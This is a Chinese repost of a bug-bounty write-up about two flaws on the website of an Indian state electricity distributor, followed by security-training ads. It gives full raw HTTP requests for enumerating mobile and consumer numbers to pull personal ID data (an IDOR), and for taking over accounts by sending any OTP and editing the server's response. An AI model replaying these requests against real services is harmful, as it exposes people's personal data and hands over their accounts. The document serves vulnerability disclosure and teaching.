百万敏感数据之IDOR + 账户接管

admin
admin
admin
146135
文章
119
评论
2024年7月14日18:53:44评论34 views字数 2468阅读8分13秒阅读模式

百万敏感数据之IDOR + 账户接管

正文

APDCL ,即印度阿萨姆邦电力分销公司,是印度阿萨姆邦政府控制的公共部门企业,负责电力分配和供应服务,确保电力供应的稳定性和可靠性,以满足居民、工业和商业客户的电力需求。

漏洞1:IDOR

在网站注册后,访问登录面板时,网站要求输入手机号码及手机号验证码进行登录。

百万敏感数据之IDOR + 账户接管

在交互过程的所有请求包中,存在多个特殊请求包,第一个为:

/website/myBijulee/fetchConsumer接口通过mobile_no参数查询消费者号码(cons_no)

POST /website/myBijulee/fetchConsumer?mobile_no=<mobile_number> HTTP/1.1Host: www.apdcl.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Referer: https://www.apdcl.org/website/Origin: https://www.apdcl.orgContent-Length: 0Te: trailersConnection: close

百万敏感数据之IDOR + 账户接管

也就是说,通过遍历手机号即可获取手机号对应的消费者号码cons_no


第二个特殊请求包为:

/cbs/RestAPI/myBijulee/ConsDetails接口通过cons_no参数获取用户信息。

POST /cbs/RestAPI/myBijulee/ConsDetails?cons_no=<consumer_number> HTTP/1.1Host: www.apdclrms.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Referer: https://www.apdcl.org/Origin: https://www.apdcl.orgConnection: close

百万敏感数据之IDOR + 账户接管

其中,敏感信息包括:姓名、电子邮件地址、手机号码、地址、税号(印度的个人识别号码)、选民身份证、身份证号码。

因此,可通过遍历手机号获取消费者号码,再遍历获取到的消费者号码得到敏感数据;

或者直接遍历cons_no参数,因为它是数字字符串。

影响范围可达五百万用户。

漏洞2:账户接管

在登录流程中,涉及登录逻辑的请求包有两个。

第一个用于向消费者的手机号码发送验证码:

POST /website/api/generateOtp?mobNo=<mobile_number> HTTP/1.1Host: www.apdcl.orgCookie: ARMSSESSIONID=M2Y5MzY5YTItODFiOS00ZmQyLWIzMTAtOTNkMTdhOGNjZjlm; JSESSIONID=5F5BB3B3B8711282CD8BA7D5F2118886.server2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Referer: https://www.apdcl.org/website/Origin: https://www.apdcl.orgContent-Length: 0Connection: close

百万敏感数据之IDOR + 账户接管

第二个请求包用于验证手机号验证码:

POST /website/api/postOtp HTTP/1.1Host: www.apdcl.orgCookie: ARMSSESSIONID=M2Y5MzY5YTItODFiOS00ZmQyLWIzMTAtOTNkMTdhOGNjZjlm; JSESSIONID=5F5BB3B3B8711282CD8BA7D5F2118886.server2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Referer: https://www.apdcl.org/website/Content-Type: application/x-www-form-urlencodedContent-Length: 29Origin: https://www.apdcl.orgConnection: closemobNo=<mobile_number>&otpNo=000000

  • 如果验证码正确,服务器将返回会话cookie并重定向至用户个人界面。

百万敏感数据之IDOR + 账户接管

  • 如果验证码错误,服务器将以302响应并将用户重定向到/website/?mobileNo=<mobile_number>

百万敏感数据之IDOR + 账户接管

可以看到,Cookie的设定形式为:
mobile=*;Domain=www.apdcl.org;Path=/;Secure;

因此鉴权参数为手机号,那么输入受害者手机号,再输入任意手机号验证码,之后在拦截的返回包中修改返回包,即可接管其账户。

百万敏感数据之IDOR + 账户接管

原文出处:
https://infosecwriteups.com/idor-account-takeover-how-i-secured-personal-information-pii-of-5-17m-electricity-consumers-a9db5e4999b9

SRC漏洞挖掘培训

玲珑安全第三期如约而至

第二期玲珑安全培训班来啦!

玲珑安全第一期SRC培训班即将开课!

往期漏洞分享

SSRF:Microsoft Azure API 管理服务

Oracle Apiary:SSRF获取元数据

SSRF 之 Azure Digital Twins Explorer

1000美元:重定向的故事

XSS之绕过HttpOnly实现帐户接管

玲珑安全交流群

百万敏感数据之IDOR + 账户接管

玲珑安全B站免费公开课

https://space.bilibili.com/602205041

百万敏感数据之IDOR + 账户接管

原文始发于微信公众号(芳华绝代安全团队):百万敏感数据之IDOR + 账户接管

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月14日18:53:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   百万敏感数据之IDOR + 账户接管https://cn-sec.com/archives/2950752.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息